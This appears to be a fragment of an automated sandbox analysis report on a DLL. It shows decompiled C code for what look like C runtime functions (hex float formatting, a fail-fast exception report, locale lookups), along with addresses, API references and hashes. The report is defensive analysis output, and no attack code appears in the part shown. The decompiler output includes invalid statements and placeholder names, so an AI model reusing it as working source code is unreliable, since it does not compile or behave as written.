Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 62a57e2bb5809c725661012eb61894a48d001bc3fa4f357520daa9e123034e04
Instruction ID: 90a17f53b447166a65c917f4af01f4b45a30f2d4eacd63348ef4b81ba144fe4f
Opcode Fuzzy Hash: 62a57e2bb5809c725661012eb61894a48d001bc3fa4f357520daa9e123034e04
Instruction Fuzzy Hash: D0518F76A08256EEEF10DFA5CC44ABA7BB9BF19700F054929E914E7180E770DA81CB71

Uniqueness

Uniqueness Score: -1.00%

Function 6DA648FC Relevance: 6.3, APIs: 4, Instructions: 337
COMMONCrypto

Download Yara Rule

C-Code - Quality: 82%

			E6DA648FC(signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t87;
				void* _t93;
				intOrPtr _t94;
				signed int _t98;
				signed int _t100;
				signed int _t101;
				signed int _t104;
				signed int _t105;
				signed int _t106;
				signed int _t111;
				void* _t113;
				signed int _t114;
				void* _t115;
				void* _t118;
				void* _t120;
				void* _t122;
				signed int* _t124;
				void* _t127;
				signed int _t129;
				signed int _t131;
				signed int _t136;
				signed int* _t140;
				signed int _t141;
				signed int _t146;
				signed int _t147;
				signed int _t149;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				signed int _t157;
				void* _t161;
				unsigned int _t162;
				intOrPtr _t171;
				signed int _t173;
				signed int* _t174;
				signed int _t176;
				signed int _t177;
				signed int _t178;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t188;
				intOrPtr _t189;
				void* _t190;

				_t186 = _a24;
				if(_t186 < 0) {
					_t186 = 0;
				}
				_t183 = _a8;
				_t3 = _t186 + 0xb; // 0xb
				 *_t183 = 0;
				if(_a12 > _t3) {
					_t140 = _a4;
					_t147 = _t140[1];
					_t173 =  *_t140;
					__eflags = (_t147 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if(__eflags != 0) {
						__eflags = _t147;
						if(__eflags > 0) {
							L13:
							_t20 = _t183 + 1; // 0x2
							_t174 = _t20;
							_t87 = _a28 ^ 0x00000001;
							_v20 = 0x3ff;
							_v5 = _t87;
							_v16 = _t174;
							_v48 = ((_t87 & 0x000000ff) << 5) + 7;
							__eflags = _t147 & 0x7ff00000;
							_t93 = 0x30;
							if((_t147 & 0x7ff00000) != 0) {
								 *_t183 = 0x31;
								L18:
								_t149 = 0;
								__eflags = 0;
								L19:
								_t28 =  &(_t174[0]); // 0x2
								_t184 = _t28;
								__eflags = _t186;
								if(_t186 != 0) {
									_t94 = _a40;
									__eflags =  *((char*)(_t94 + 0x14));
									if(__eflags == 0) {
										E6DA5F860(_t94, _t174, __eflags);
										_t94 = _a40;
										_t174 = _v16;
									}
									_t149 = 0;
									__eflags = 0;
									_t98 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)) + 0x88))))));
								} else {
									_t98 = _t149;
								}
								 *_t174 = _t98;
								_t100 = _t140[1] & 0x000fffff;
								__eflags = _t100;
								_v40 = _t100;
								if(_t100 > 0) {
									L26:
									_t175 = _t149;
									_t150 = 0xf0000;
									_t101 = 0x30;
									_v12 = _t101;
									_v24 = _t149;
									_v28 = 0xf0000;
									while(1) {
										_v32 = _v12 & 0x0000ffff;
										_t104 = _t184;
										_v36 = _t184;
										_v40 = _t186;
										__eflags = _t186;
										if(__eflags <= 0) {
											break;
										}
										_t127 = E6DA71EF0( *_t140 & _t175, _v32 & 0x0000ffff, _t140[1] & _t150 & 0x000fffff);
										_t161 = 0x30;
										_t129 = _t127 + _t161 & 0x0000ffff;
										__eflags = _t129 - 0x39;
										if(_t129 > 0x39) {
											_t129 = _t129 + _v48;
											__eflags = _t129;
										}
										_t162 = _v28;
										_t175 = (_t162 << 0x00000020 | _v24) >> 4;
										 *_t184 = _t129;
										_t184 = _t184 + 1;
										_t150 = _t162 >> 4;
										_t131 = _v12 - 4;
										_t186 = _t186 - 1;
										_v24 = (_t162 << 0x00000020 | _v24) >> 4;
										_v28 = _t162 >> 4;
										_v12 = _t131;
										__eflags = _t131;
										if(_t131 >= 0) {
											continue;
										} else {
											goto L43;
										}
									}
									_t186 = _v40;
									_t184 = _t104;
									_t105 = E6DA6512D(__eflags, _t140, _t175, _t150, _v32, _a36);
									_t190 = _t190 + 0x14;
									__eflags = _t105;
									if(_t105 == 0) {
										goto L43;
									}
									_t184 = _v36;
									_t146 = 0x30;
									_t124 = _t184 - 1;
									while(1) {
										_t156 =  *_t124;
										__eflags = _t156 - 0x66;
										if(_t156 == 0x66) {
											goto L36;
										}
										__eflags = _t156 - 0x46;
										if(_t156 != 0x46) {
											_t140 = _a4;
											__eflags = _t124 - _v16;
											if(_t124 == _v16) {
												_t65 = _t124 - 1;
												 *_t65 =  *(_t124 - 1) + 1;
												__eflags =  *_t65;
											} else {
												__eflags = _t156 - 0x39;
												if(_t156 != 0x39) {
													_t157 = _t156 + 1;
													__eflags = _t157;
												} else {
													_t157 = _v48 + 0x3a;
												}
												 *_t124 = _t157;
											}
											goto L43;
										}
										L36:
										 *_t124 = _t146;
										_t124 = _t124 - 1;
									}
								} else {
									__eflags =  *_t140 - _t149;
									if( *_t140 <= _t149) {
										L43:
										__eflags = _t186;
										if(_t186 > 0) {
											_push(_t186);
											_t122 = 0x30;
											_push(_t122);
											_push(_t184);
											E6DA5B0A0(_t184);
											_t184 = _t184 + _t186;
											__eflags = _t184;
										}
										_t106 = _v16;
										__eflags =  *_t106;
										if( *_t106 == 0) {
											_t184 = _t106;
										}
										 *_t184 = (_v5 << 5) + 0x50;
										_t176 = _t140[1];
										_t111 = E6DA71EF0( *_t140, 0x34, _t176);
										_t141 = 0;
										_t188 = _t176 & 0;
										_t70 = _t184 + 2; // 0x2
										_t177 = _t70;
										_t154 = (_t111 & 0x000007ff) - _v20;
										__eflags = _t154;
										_v48 = _t177;
										asm("sbb esi, ebx");
										if(__eflags < 0) {
											L51:
											_t154 =  ~_t154;
											asm("adc esi, ebx");
											_t188 =  ~_t188;
											0x2b = 0x2d;
											goto L52;
										} else {
											if(__eflags > 0) {
												L50:
												L52:
												 *(_t184 + 1) = 0x2b;
												_t185 = _t177;
												_t113 = 0x30;
												 *_t177 = _t113;
												__eflags = _t188 - _t141;
												if(__eflags < 0) {
													L61:
													_t178 = 0x30;
													L62:
													__eflags = _t188 - _t141;
													if(__eflags < 0) {
														L66:
														_t155 = _t154 + _t178;
														__eflags = _t155;
														 *_t185 = _t155;
														 *(_t185 + 1) = _t141;
														L67:
														_t114 = 0;
														__eflags = 0;
														L68:
														return _t114;
													}
													if(__eflags > 0) {
														L65:
														_push(_t141);
														_push(_t141);
														_push(0xa);
														_push(_t188);
														_push(_t154);
														_t115 = E6DA71F10();
														_v48 = _t178;
														_t178 = 0x30;
														 *_t185 = _t115 + _t178;
														_t185 = _t185 + 1;
														_t141 = 0;
														__eflags = 0;
														goto L66;
													}
													__eflags = _t154 - 0xa;
													if(_t154 < 0xa) {
														goto L66;
													}
													goto L65;
												}
												if(__eflags > 0) {
													L55:
													_push(_t141);
													_push(_t141);
													_push(0x3e8);
													_push(_t188);
													_push(_t154);
													_t118 = E6DA71F10();
													_t188 = _t141;
													_v40 = _t177;
													_t177 = _v48;
													_t141 = 0;
													_t185 = _t177 + 1;
													 *_t177 = _t118 + 0x30;
													__eflags = _t185 - _t177;
													if(_t185 != _t177) {
														L59:
														_push(_t141);
														_push(_t141);
														_push(0x64);
														_push(_t188);
														_push(_t154);
														_t120 = E6DA71F10();
														_t188 = _t141;
														_v40 = _t177;
														_t141 = 0;
														_t178 = 0x30;
														 *_t185 = _t120 + _t178;
														_t185 = _t185 + 1;
														__eflags = _t185 - _v48;
														if(_t185 != _v48) {
															goto L65;
														}
														goto L62;
													}
													L56:
													__eflags = _t188 - _t141;
													if(__eflags < 0) {
														goto L61;
													}
													if(__eflags > 0) {
														goto L59;
													}
													__eflags = _t154 - 0x64;
													if(_t154 < 0x64) {
														goto L61;
													}
													goto L59;
												}
												__eflags = _t154 - 0x3e8;
												if(_t154 < 0x3e8) {
													goto L56;
												}
												goto L55;
											}
											__eflags = _t154;
											if(_t154 < 0) {
												goto L51;
											}
											goto L50;
										}
									}
									goto L26;
								}
							}
							 *_t183 = _t93;
							_t149 =  *_t140 | _t140[1] & 0x000fffff;
							__eflags = _t149;
							if(_t149 != 0) {
								_v20 = 0x3fe;
								goto L18;
							}
							_v20 = _t149;
							goto L19;
						}
						if(__eflags < 0) {
							L12:
							 *_t183 = 0x2d;
							_t183 = _t183 + 1;
							__eflags = _t183;
							_t147 = _t140[1];
							goto L13;
						}
						__eflags = _t173;
						if(_t173 >= 0) {
							goto L13;
						}
						goto L12;
					}
					_t114 = E6DA64C28(_t140, _t147, _t173, __eflags, _t140, _t183, _a12, _a16, _a20, _t186, 0, _a32, _a36, _a40);
					__eflags = _t114;
					if(_t114 == 0) {
						_t136 = E6DA72080(_t183, 0x65);
						__eflags = _t136;
						if(_t136 != 0) {
							 *_t136 = ((_a28 ^ 0x00000001) << 5) + 0x50;
							 *((char*)(_t136 + 3)) = 0;
						}
						goto L67;
					}
					 *_t183 = 0;
					goto L68;
				}
				_t171 = _a40;
				_t189 = 0x22;
				 *((char*)(_t171 + 0x1c)) = 1;
				 *((intOrPtr*)(_t171 + 0x18)) = _t189;
				E6DA5DA42(_t183, _t189, 0, 0, 0, 0, 0, _t171);
				return _t189;
			}

0x6da64907
0x6da6490d
0x6da6490f
0x6da6490f
0x6da64911
0x6da64914
0x6da64917
0x6da6491c
0x6da64941
0x6da64944
0x6da64949
0x6da64953
0x6da64958
0x6da649b1
0x6da649b3
0x6da649c2
0x6da649c5
0x6da649c5
0x6da649c8
0x6da649ca
0x6da649d1
0x6da649e3
0x6da649e6
0x6da649eb
0x6da649ef
0x6da649f0
0x6da64a10
0x6da64a13
0x6da64a13
0x6da64a13
0x6da64a15
0x6da64a15
0x6da64a15
0x6da64a18
0x6da64a1a
0x6da64a20
0x6da64a23
0x6da64a27
0x6da64a2b
0x6da64a30
0x6da64a33
0x6da64a33
0x6da64a39
0x6da64a39
0x6da64a43
0x6da64a1c
0x6da64a1c
0x6da64a1c
0x6da64a45
0x6da64a4a
0x6da64a4a
0x6da64a4f
0x6da64a52
0x6da64a5c
0x6da64a5e
0x6da64a60
0x6da64a65
0x6da64a66
0x6da64a69
0x6da64a6c
0x6da64a6f
0x6da64a75
0x6da64a78
0x6da64a7a
0x6da64a7d
0x6da64a80
0x6da64a82
0x00000000
0x00000000
0x6da64a99
0x6da64aa0
0x6da64aa4
0x6da64aa7
0x6da64aaa
0x6da64aac
0x6da64aac
0x6da64aac
0x6da64ab2
0x6da64ab5
0x6da64ab9
0x6da64abb
0x6da64abf
0x6da64ac2
0x6da64ac5
0x6da64ac6
0x6da64ac9
0x6da64acc
0x6da64acf
0x6da64ad2
0x00000000
0x6da64ad4
0x00000000
0x6da64ad4
0x6da64ad2
0x6da64ad9
0x6da64adc
0x6da64ae4
0x6da64ae9
0x6da64aec
0x6da64aee
0x00000000
0x00000000
0x6da64af0
0x6da64af5
0x6da64af6
0x6da64af9
0x6da64af9
0x6da64afb
0x6da64afe
0x00000000
0x00000000
0x6da64b00
0x6da64b03
0x6da64b0a
0x6da64b0d
0x6da64b10
0x6da64b25
0x6da64b25
0x6da64b25
0x6da64b12
0x6da64b12
0x6da64b15
0x6da64b1f
0x6da64b1f
0x6da64b17
0x6da64b1a
0x6da64b1a
0x6da64b21
0x6da64b21
0x00000000
0x6da64b10
0x6da64b05
0x6da64b05
0x6da64b07
0x6da64b07
0x6da64a54
0x6da64a54
0x6da64a56
0x6da64b28
0x6da64b28
0x6da64b2a
0x6da64b2c
0x6da64b2f
0x6da64b30
0x6da64b31
0x6da64b32
0x6da64b3a
0x6da64b3a
0x6da64b3a
0x6da64b3c
0x6da64b3f
0x6da64b42
0x6da64b44
0x6da64b44
0x6da64b50
0x6da64b54
0x6da64b57
0x6da64b5c
0x6da64b68
0x6da64b6a
0x6da64b6a
0x6da64b6d
0x6da64b6d
0x6da64b70
0x6da64b73
0x6da64b75
0x6da64b81
0x6da64b81
0x6da64b85
0x6da64b87
0x6da64b89
0x00000000
0x6da64b77
0x6da64b77
0x6da64b7d
0x6da64b8a
0x6da64b8a
0x6da64b8d
0x6da64b91
0x6da64b92
0x6da64b94
0x6da64b96
0x6da64bf2
0x6da64bf4
0x6da64bf5
0x6da64bf5
0x6da64bf7
0x6da64c1a
0x6da64c1a
0x6da64c1a
0x6da64c1c
0x6da64c1e
0x6da64c21
0x6da64c21
0x6da64c21
0x6da64c23
0x00000000
0x6da64c23
0x6da64bf9
0x6da64c00
0x6da64c00
0x6da64c01
0x6da64c02
0x6da64c04
0x6da64c05
0x6da64c06
0x6da64c0f
0x6da64c12
0x6da64c15
0x6da64c17
0x6da64c18
0x6da64c18
0x00000000
0x6da64c18
0x6da64bfb
0x6da64bfe
0x00000000
0x00000000
0x00000000
0x6da64bfe
0x6da64b9d
0x6da64ba3
0x6da64ba3
0x6da64ba4
0x6da64ba5
0x6da64ba6
0x6da64ba7
0x6da64ba8
0x6da64bad
0x6da64bb1
0x6da64bb6
0x6da64bb9
0x6da64bbb
0x6da64bbe
0x6da64bc0
0x6da64bc2
0x6da64bcf
0x6da64bcf
0x6da64bd0
0x6da64bd1
0x6da64bd3
0x6da64bd4
0x6da64bd5
0x6da64bda
0x6da64be0
0x6da64be3
0x6da64be5
0x6da64be8
0x6da64bea
0x6da64beb
0x6da64bee
0x00000000
0x00000000
0x00000000
0x6da64bf0
0x6da64bc4
0x6da64bc4
0x6da64bc6
0x00000000
0x00000000
0x6da64bc8
0x00000000
0x00000000
0x6da64bca
0x6da64bcd
0x00000000
0x00000000
0x00000000
0x6da64bcd
0x6da64b9f
0x6da64ba1
0x00000000
0x00000000
0x00000000
0x6da64ba1
0x6da64b79
0x6da64b7b
0x00000000
0x00000000
0x00000000
0x6da64b7b
0x6da64b75
0x00000000
0x6da64a56
0x6da64a52
0x6da649f2
0x6da649fe
0x6da649fe
0x6da64a00
0x6da64a07
0x00000000
0x6da64a07
0x6da64a02
0x00000000
0x6da64a02
0x6da649b5
0x6da649bb
0x6da649bb
0x6da649be
0x6da649be
0x6da649bf
0x00000000
0x6da649bf
0x6da649b7
0x6da649b9
0x00000000
0x00000000
0x00000000
0x6da649b9
0x6da64972
0x6da6497a
0x6da6497c
0x6da64989
0x6da64990
0x6da64992
0x6da649a4
0x6da649a6
0x6da649a6
0x00000000
0x6da64992
0x6da6497e
0x00000000
0x6da6497e
0x6da6491e
0x6da64923
0x6da6492a
0x6da6492e
0x6da64931
0x00000000

APIs

_strrchr.LIBCMT ref: 6DA64989

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: cee29c366bfd669357f0ef9838885ede6ddc8c41f03f959e052772214be76418
Instruction ID: aca5e895588d6960436c269eaf8ac52354f008a68323c8cabab77cea01e145e3
Opcode Fuzzy Hash: cee29c366bfd669357f0ef9838885ede6ddc8c41f03f959e052772214be76418
Instruction Fuzzy Hash: 72B1383690C286DFDB058F68C8A07FEBBB5EF5D314F15816AE904AB241D3B59981C7B0

Uniqueness

Uniqueness Score: -1.00%

Function 6DA59EC6 Relevance: 6.1, APIs: 4, Instructions: 73
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E6DA59EC6(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E6DA59FE1(_t34);
				 *_t60 = 0x2cc;
				_v632 = E6DA5B0A0(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E6DA5B0A0(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E6DA59FE1(_t49);
				}
				return _t49;
			}

0x6da59ec6
0x6da59ec6
0x6da59ec6
0x6da59eda
0x6da59edc
0x6da59edf
0x6da59edf
0x6da59ee3
0x6da59ee8
0x6da59f00
0x6da59f06
0x6da59f0c
0x6da59f12
0x6da59f18
0x6da59f1e
0x6da59f24
0x6da59f2b
0x6da59f32
0x6da59f39
0x6da59f40
0x6da59f47
0x6da59f4e
0x6da59f4f
0x6da59f58
0x6da59f5e
0x6da59f61
0x6da59f67
0x6da59f76
0x6da59f82
0x6da59f8d
0x6da59f94
0x6da59f9b
0x6da59fa6
0x6da59fae
0x6da59fb7
0x6da59fb9
0x6da59fbc
0x6da59fbe
0x6da59fc8
0x6da59fd0
0x6da59fd6
0x00000000
0x6da59fdd
0x6da59fe0

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6DA59ED2
IsDebuggerPresent.KERNEL32 ref: 6DA59F9E
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6DA59FBE
UnhandledExceptionFilter.KERNEL32(?), ref: 6DA59FC8

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: e0aa7049a1ee584064c92e2410732f8d44cabf8c7840a76437307466e463e2f3
Instruction ID: da38a9ee081891c9364678e75414c87e27a94ced988251f52ea90fc613858942
Opcode Fuzzy Hash: e0aa7049a1ee584064c92e2410732f8d44cabf8c7840a76437307466e463e2f3
Instruction Fuzzy Hash: 673108B9D0931C9BDF11DFA4DA897CDBBB8AF08304F10419AE50DAB240EB755A85CF45

Uniqueness

Uniqueness Score: -1.00%

Function 6DA6C3C1 Relevance: 4.7, APIs: 3, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E6DA6C3C1(void* __ecx, signed char __edx, intOrPtr _a4) {
				signed int _v8;
				short _v248;
				signed int _v252;
				intOrPtr _v256;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t50;
				int _t56;
				signed int _t58;
				void* _t74;
				intOrPtr _t80;
				void* _t89;
				void* _t92;
				intOrPtr _t93;
				void* _t94;
				signed int _t111;
				signed int _t115;
				intOrPtr* _t117;
				intOrPtr* _t122;
				signed int* _t124;
				int _t126;
				signed int _t127;
				void* _t128;
				void* _t140;

				_t121 = __edx;
				_t50 =  *0x6da83014; // 0xa0d58914
				_v8 = _t50 ^ _t127;
				_t125 = _a4;
				_t94 = E6DA62BDC(__ecx, __edx, _a4);
				_t124 =  *(E6DA62BDC(__ecx, __edx, _a4) + 0x34c);
				_t126 = E6DA6C6E9(_t125);
				asm("sbb ecx, ecx");
				_t56 = GetLocaleInfoW(_t126, ( ~( *(_t94 + 0x64)) & 0xfffff005) + 0x1002,  &_v248, 0x78);
				_v252 = _v252 & 0x00000000;
				if(_t56 == 0) {
					L37:
					 *_t124 = 0;
					_t58 = 1;
					L38:
					return E6DA59B91(_t58, _t94, _v8 ^ _t127, _t121, _t124, _t126);
				}
				if(E6DA690B4(_t124, _t126,  *((intOrPtr*)(_t94 + 0x54)),  &_v248) != 0) {
					L16:
					if(( *_t124 & 0x00000300) == 0x300) {
						L36:
						_t58 =  !( *_t124 >> 2) & 0x00000001;
						goto L38;
					}
					asm("sbb eax, eax");
					if(GetLocaleInfoW(_t126, ( ~( *(_t94 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78) == 0) {
						goto L37;
					}
					_t74 = E6DA690B4(_t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248);
					if(_t74 != 0) {
						if( *(_t94 + 0x60) == 0 &&  *((intOrPtr*)(_t94 + 0x5c)) != 0 && E6DA690B4(_t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248) == 0) {
							_push(_t124);
							_t94 = 0;
							if(E6DA6C843(_t126, 0) == 0) {
								goto L36;
							}
							 *_t124 =  *_t124 | 0x00000100;
							L34:
							if(_t140 == 0) {
								_t124[1] = _t126;
							}
						}
						goto L36;
					}
					_t111 =  *_t124 | 0x00000200;
					 *_t124 = _t111;
					if( *(_t94 + 0x60) == _t74) {
						if( *((intOrPtr*)(_t94 + 0x5c)) == _t74) {
							goto L20;
						}
						_t122 =  *((intOrPtr*)(_t94 + 0x50));
						_v256 = _t122 + 2;
						do {
							_t80 =  *_t122;
							_t122 = _t122 + 2;
						} while (_t80 != _v252);
						_t121 = _t122 - _v256 >> 1;
						if(_t122 - _v256 >> 1 !=  *((intOrPtr*)(_t94 + 0x5c))) {
							_t74 = 0;
							goto L20;
						}
						_push(_t124);
						if(E6DA6C843(_t126, 1) == 0) {
							goto L36;
						}
						 *_t124 =  *_t124 | 0x00000100;
						_t74 = 0;
						L21:
						_t140 = _t124[1] - _t74;
						goto L34;
					}
					L20:
					 *_t124 = _t111 | 0x00000100;
					goto L21;
				}
				asm("sbb eax, eax");
				if(GetLocaleInfoW(_t126, ( ~( *(_t94 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78) == 0) {
					goto L37;
				}
				_t89 = E6DA690B4(_t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248);
				_t115 =  *_t124;
				if(_t89 != 0) {
					if((_t115 & 0x00000002) != 0) {
						goto L16;
					}
					if( *((intOrPtr*)(_t94 + 0x5c)) == 0) {
						L12:
						_t121 =  *_t124;
						if((_t121 & 0x00000001) != 0 || E6DA6C81E(_t126) == 0) {
							goto L16;
						} else {
							 *_t124 = _t121;
							goto L15;
						}
					}
					_t92 = E6DA707D4(_t94, _t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248,  *((intOrPtr*)(_t94 + 0x5c)));
					_t128 = _t128 + 0xc;
					if(_t92 != 0) {
						goto L12;
					}
					 *_t124 =  *_t124 | 0x00000002;
					_t124[2] = _t126;
					_t117 =  *((intOrPtr*)(_t94 + 0x50));
					_t121 = _t117 + 2;
					do {
						_t93 =  *_t117;
						_t117 = _t117 + 2;
					} while (_t93 != _v252);
					if(_t117 - _t121 >> 1 ==  *((intOrPtr*)(_t94 + 0x5c))) {
						_t124[1] = _t126;
					}
				} else {
					_t124[1] = _t126;
					 *_t124 = _t115 | 0x00000304;
					L15:
					_t124[2] = _t126;
				}
			}

0x6da6c3c1
0x6da6c3cc
0x6da6c3d3
0x6da6c3d8
0x6da6c3e1
0x6da6c3e9
0x6da6c3f8
0x6da6c404
0x6da6c415
0x6da6c41b
0x6da6c424
0x6da6c5fe
0x6da6c600
0x6da6c602
0x6da6c603
0x6da6c611
0x6da6c611
0x6da6c43d
0x6da6c4f8
0x6da6c503
0x6da6c5f2
0x6da6c5f9
0x00000000
0x6da6c5f9
0x6da6c517
0x6da6c52d
0x00000000
0x00000000
0x6da6c53d
0x6da6c546
0x6da6c5b7
0x6da6c5d3
0x6da6c5d4
0x6da6c5e2
0x00000000
0x00000000
0x6da6c5e4
0x6da6c5ed
0x6da6c5ed
0x6da6c5ef
0x6da6c5ef
0x6da6c5ed
0x00000000
0x6da6c5b7
0x6da6c54a
0x6da6c550
0x6da6c555
0x6da6c56a
0x00000000
0x00000000
0x6da6c56c
0x6da6c572
0x6da6c578
0x6da6c578
0x6da6c57b
0x6da6c57e
0x6da6c58d
0x6da6c592
0x6da6c5ae
0x00000000
0x6da6c5ae
0x6da6c594
0x6da6c5a2
0x00000000
0x00000000
0x6da6c5a4
0x6da6c5aa
0x6da6c55f
0x6da6c55f
0x00000000
0x6da6c55f
0x6da6c557
0x6da6c55d
0x00000000
0x6da6c55d
0x6da6c451
0x6da6c467
0x00000000
0x00000000
0x6da6c477
0x6da6c47e
0x6da6c482
0x6da6c494
0x00000000
0x00000000
0x6da6c49a
0x6da6c4de
0x6da6c4de
0x6da6c4e3
0x00000000
0x6da6c4f0
0x6da6c4f3
0x00000000
0x6da6c4f3
0x6da6c4e3
0x6da6c4a9
0x6da6c4ae
0x6da6c4b3
0x00000000
0x00000000
0x6da6c4b5
0x6da6c4b8
0x6da6c4bb
0x6da6c4be
0x6da6c4c1
0x6da6c4c1
0x6da6c4c4
0x6da6c4c7
0x6da6c4d7
0x6da6c4d9
0x6da6c4d9
0x6da6c484
0x6da6c48a
0x6da6c48d
0x6da6c4f5
0x6da6c4f5
0x6da6c4f5

APIs

Part of subcall function 6DA62BDC: GetLastError.KERNEL32(?,00000008,6DA68ED9), ref: 6DA62BE0
Part of subcall function 6DA62BDC: SetLastError.KERNEL32(00000000,?,00000005,000000FF), ref: 6DA62C82

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6DA6C415
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6DA6C45F
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6DA6C525

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: c06554caffb3647e063839773b6138142028f94a20e7e477b960a53ab50d5070
Instruction ID: 87817974f62113974e33ae685618f9c4e98037e59400adcb79174df33ce36518
